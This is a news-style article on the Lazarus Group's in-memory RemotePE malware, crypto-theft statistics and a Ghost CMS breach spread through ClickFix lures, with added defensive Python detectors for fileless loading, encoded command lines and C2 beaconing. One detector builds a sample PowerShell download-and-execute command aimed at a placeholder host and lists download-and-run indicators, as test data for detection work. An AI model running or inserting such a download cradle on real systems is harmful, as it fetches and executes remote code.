Cybersecurity experts have detected a new strain of malware deployed by the North Korea-linked Lazarus Group. This “RemotePE” fileless remote access tool (RAT) specifically targets banks and cryptocurrency firms. Discovered in September 2025, the malware operates entirely in memory, making it exceptionally hard for conventional security systems to detect, as it leaves virtually no trace on infected machines.
Lazarus Group’s social engineering strategy
Lazarus Group attacks often begin with sophisticated social engineering. Posing as employees of investment firms on Telegram, attackers initiate contact and send fake meeting requests via platforms like Calendly and Picktime. After the initial meeting, the attackers follow up with a sequence of steps that culminate in the malicious software being installed on the victim’s device. This “human factor” approach significantly increases the likelihood of a successful breach.
Lazarus Group exploits social engineering by drawing victims into trusted relationships, enabling the first stage of malware installation. The attack progresses through a targeted and multi-step chain for maximum impact.
In the opening phase, a dynamic-link library (DLL) named DPAPILoader is activated. This component uses Windows’ Data Protection Application Programming Interface (DPAPI) to decrypt the next-stage payload stored on disk. The RemotePELoader then retrieves the following payload via HTTP from a remote Command and Control (C2) server and loads it directly into memory. Finally, the main RemotePE payload runs solely in memory, barely touching the file system.
Mini glossary: A C2 (Command and Control) server is a central hub used by attackers to remotely manage malware, exchange instructions and transmit stolen data.
Three-stage next-generation attack chain
RemotePELoader employs advanced evasion techniques such as Hell’s Gate and ETW patching to circumvent contemporary security tools. This three-stage architecture minimizes disk activity and makes tracking digital footprints nearly impossible. In a recently disclosed incident, investigators found that a decentralized finance (DeFi) company’s infrastructure was compromised through the sequential use of three remote access tools: RemotePE, PondRAT, and ThemeForestRAT.
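Because the chain leaves almost nothing on disk, a defender has to look for the sequence of behaviours rather than a file. The following is an added example (not code from the article or from Fox-IT’s report) that hunts over constructed Sysmon-style endpoint events for that sequence: a loader DLL is loaded, the same process then talks to a remote host, and shortly afterwards executes from memory without a file ever being written in between. The event field names, the DLL path and the addresses are assumptions made for illustration.

```python
"""Added example, not from the article or Fox-IT's analysis: correlate
constructed endpoint events into the staged, in-memory pattern described
above.  Field names, paths and addresses are assumptions for illustration."""
from collections import defaultdict

# Constructed events: ts in seconds, owning pid, event type, free-text detail.
EVENTS = [
    # Suspicious: loader DLL -> network fetch -> execution from unbacked memory
    {"ts": 100, "pid": 4242, "event": "image_load", "detail": r"C:\Users\a\AppData\Local\Temp\DPAPILoader.dll"},
    {"ts": 103, "pid": 4242, "event": "network", "detail": "203.0.113.7:80"},
    {"ts": 104, "pid": 4242, "event": "memory_exec", "detail": "thread started in unbacked RWX region"},
    # Ordinary download: the file is written to disk before anything executes
    {"ts": 200, "pid": 5151, "event": "image_load", "detail": r"C:\Windows\System32\wininet.dll"},
    {"ts": 201, "pid": 5151, "event": "network", "detail": "198.51.100.9:443"},
    {"ts": 202, "pid": 5151, "event": "file_write", "detail": r"C:\Users\a\Downloads\update.exe"},
    {"ts": 203, "pid": 5151, "event": "memory_exec", "detail": "thread started in update.exe"},
]


def find_fileless_chains(events, window=60):
    """Return one hit per process in which image_load -> network -> memory_exec
    happen in that order within `window` seconds and no file_write occurs
    between the network event and the in-memory execution."""
    by_pid = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_pid[e["pid"]].append(e)

    hits = []
    for pid, evs in by_pid.items():
        for i, load in enumerate(evs):
            if load["event"] != "image_load":
                continue
            # First network event after the load, still inside the window
            j = next((k for k in range(i + 1, len(evs)) if evs[k]["event"] == "network"), None)
            if j is None or evs[j]["ts"] - load["ts"] > window:
                continue
            # Walk forward: a file write breaks the fileless pattern, a memory
            # execution before any write completes it.
            for e in evs[j + 1:]:
                if e["ts"] - load["ts"] > window or e["event"] == "file_write":
                    break
                if e["event"] == "memory_exec":
                    hits.append({"pid": pid, "dll": load["detail"],
                                 "remote": evs[j]["detail"], "ts": e["ts"]})
                    break
    return hits


if __name__ == "__main__":
    for hit in find_fileless_chains(EVENTS):
        print(hit)
```

Only pid 4242 matches: the second process also loads a DLL and reaches out to the network, but it writes a file before executing, which is what a normal installer or updater does. In a real deployment the three event kinds map onto the corresponding Sysmon or EDR telemetry, and the window and DLL-path filters are tuned to the environment.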
| Attack Tool | Year Used | Detection Difficulty | Target Sector |
|---|---|---|---|
| RemotePE | 2025-2026 | Very high | Crypto, Banking |
| PondRAT | 2025 | High | DeFi, Finance |
| ThemeForestRAT | 2025 | High | Finance |
Lazarus Group’s 2026 track record and technical analysis
Fox-IT’s analysis shows that RemotePE’s use of DPAPI for key management, its exclusively memory-based operation, and advanced evasion techniques like ETW patching and Hell’s Gate render it nearly immune to standard detection and analysis tools. These traits mean that conventional anti-malware scans are largely ineffective against it. Furthermore, Lazarus Group was found to have stolen a total of $577 million in crypto in just two major hacks, accounting for 76% of all global crypto thefts in the first four months of 2026.
TRM Labs reports that North Korea-linked hackers stole $577 million worth of digital assets in only two incidents during the first four months of 2026, pushing North Korea’s share of crypto thefts to its highest level in recent years.
While North Korean actors accounted for 64% of crypto hacks in 2025, their share surged to 76% in 2026. Since 2017, the cumulative value of stolen crypto has reached $6 billion, fueling allegations that these funds support the country’s sanctioned weapons and nuclear programs.
AI-driven attacks and software vulnerabilities
As digital asset traders and developers increasingly turn to artificial intelligence for streamlined operations, attackers are also leveraging AI-based techniques. Separately, researchers have revealed a mass data breach affecting over 700 sites running the Ghost content management system, caused by a critical SQL injection vulnerability.
As a result, administrative usernames and passwords were captured, allowing malware to be distributed through lures such as ClickFix. The targeted list includes universities, AI projects, blockchain service providers, software companies, and fintech startups. Victims who execute Base64-encoded code supplied via fake CAPTCHA prompts unwittingly download malware-laden files.
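The tell-tale artefact of a ClickFix lure is a long Base64 blob on the command line of a process the user launched by hand. The following added example (not code from the article) decodes such blobs from constructed process-creation log entries and flags the ones whose decoded text contains download-and-run indicators; the command lines, the keyword list and the hostname are assumptions, and the "malicious" sample is generated inside the script rather than taken from any real incident.

```python
"""Added example, not from the article: find Base64-encoded command lines
in constructed process-creation logs and flag decoded content that looks
like a download-and-execute instruction.  Samples and keywords are assumed."""
import base64
import re

# PowerShell's -EncodedCommand takes Base64 of UTF-16LE text; mimic that here
# to build a constructed sample line (example.invalid is a reserved TLD).
_ENCODED_SAMPLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')".encode("utf-16-le")
).decode()
_BENIGN_SAMPLE = base64.b64encode(b"quarterly planning notes for the finance team meeting").decode()

# Constructed process-creation command lines, as an EDR would record them
COMMAND_LINES = [
    f"powershell.exe -nop -w hidden -enc {_ENCODED_SAMPLE}",
    r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
    f"cmd.exe /c echo {_BENIGN_SAMPLE} > note.txt",
]

# Long runs of Base64 characters; short tokens are ignored to reduce noise
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Indicators of a download-and-run stage (lower-cased for matching)
INDICATORS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
              "invoke-expression", "iex ", "net.webclient", "http://", "https://", "rundll32")


def decode_text(raw: bytes) -> str:
    """Prefer UTF-16LE (PowerShell convention); fall back to UTF-8."""
    try:
        text = raw.decode("utf-16-le")
        if text.isprintable() and sum(c.isascii() for c in text) / len(text) > 0.9:
            return text
    except UnicodeDecodeError:
        pass
    return raw.decode("utf-8", errors="replace")


def decoded_blobs(cmdline: str):
    """Yield decoded text for every long Base64 token in a command line."""
    for token in B64_TOKEN.findall(cmdline):
        try:
            raw = base64.b64decode(token, validate=True)
        except (ValueError, base64.binascii.Error):
            continue
        yield decode_text(raw)


def scan_command_lines(lines):
    """Return (line index, decoded text) for lines whose decoded Base64 carries an indicator."""
    hits = []
    for idx, line in enumerate(lines):
        for text in decoded_blobs(line):
            if any(ind in text.lower() for ind in INDICATORS):
                hits.append((idx, text))
                break
    return hits


if __name__ == "__main__":
    for idx, text in scan_command_lines(COMMAND_LINES):
        print(f"line {idx}: {text}")
```

Only the first line is flagged; the third also carries a long Base64 token, but its decoded text is harmless, which is why the check decodes rather than merely matching on the presence of Base64.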
Older versions of the malware were deployed using Windows’ “rundll32.exe” utility, but more recently, attackers have used the open-source Electron-based Grape app to infiltrate systems. Once installed, the malware connects to its C2 domain every 30 seconds to receive fresh commands.
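A fixed 30-second polling interval is itself a detectable signal: human-driven traffic to a host is bursty, while a beacon is metronomic. The following added example (not code from the article) measures inter-connection timing per client/host pair over constructed web-proxy log lines and reports pairs whose intervals are suspiciously regular. The log format, hostnames and thresholds are assumptions.

```python
"""Added example, not from the article: detect regular C2 beaconing in
constructed proxy log lines by measuring the regularity of inter-connection
intervals per (client, host) pair.  Format, hosts and thresholds are assumed."""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev

FMT = "%Y-%m-%dT%H:%M:%SZ"
BASE = datetime(2026, 4, 2, 10, 0, 0)


def _line(offset, src, host):
    """Build one constructed log line `offset` seconds after BASE."""
    ts = (BASE + timedelta(seconds=offset)).strftime(FMT)
    return f"{ts} {src} GET {host} /update 200"


# Constructed sample log. The first host is polled every 30 s with +-1 s of
# jitter; the others show ordinary, irregular browsing (example.invalid is reserved).
SAMPLE_LOG = (
    [_line(30 * i + j, "10.0.0.5", "c2.example.invalid")
     for i, j in enumerate([0, 1, -1, 0, 1, 0, -1, 0])]
    + [_line(o, "10.0.0.5", "cdn.example.invalid") for o in (0, 5, 125, 132, 532, 544)]
    + [_line(40, "10.0.0.5", "docs.example.invalid")]
)


def parse(lines):
    """Yield (timestamp, client, host) from each log line."""
    for line in lines:
        ts, src, _method, host, _path, _status = line.split()
        yield datetime.strptime(ts, FMT), src, host


def find_beacons(lines, min_count=5, max_cv=0.15, min_interval=5, max_interval=3600):
    """Return (client, host) pairs whose connection intervals are machine-like.

    Regularity is measured with the coefficient of variation (stdev / mean) of
    the inter-connection intervals; a low value means near-constant spacing."""
    groups = defaultdict(list)
    for ts, src, host in parse(lines):
        groups[(src, host)].append(ts)

    hits = []
    for (src, host), stamps in groups.items():
        if len(stamps) < min_count:          # too few samples to judge
            continue
        stamps.sort()
        deltas = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(deltas)
        if not (min_interval <= avg <= max_interval):
            continue
        cv = pstdev(deltas) / avg
        if cv <= max_cv:
            hits.append({"src": src, "host": host, "count": len(stamps),
                         "mean_interval": avg, "cv": round(cv, 3)})
    return hits


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(hit)
```

The beaconing host is reported with a mean interval of 30 seconds and a coefficient of variation near 0.04; the CDN host, with the same number of requests but erratic spacing, is not. Malware that adds large random jitter defeats this particular statistic, so in practice it is paired with other signals such as the connection count over a full day and the reputation of the destination.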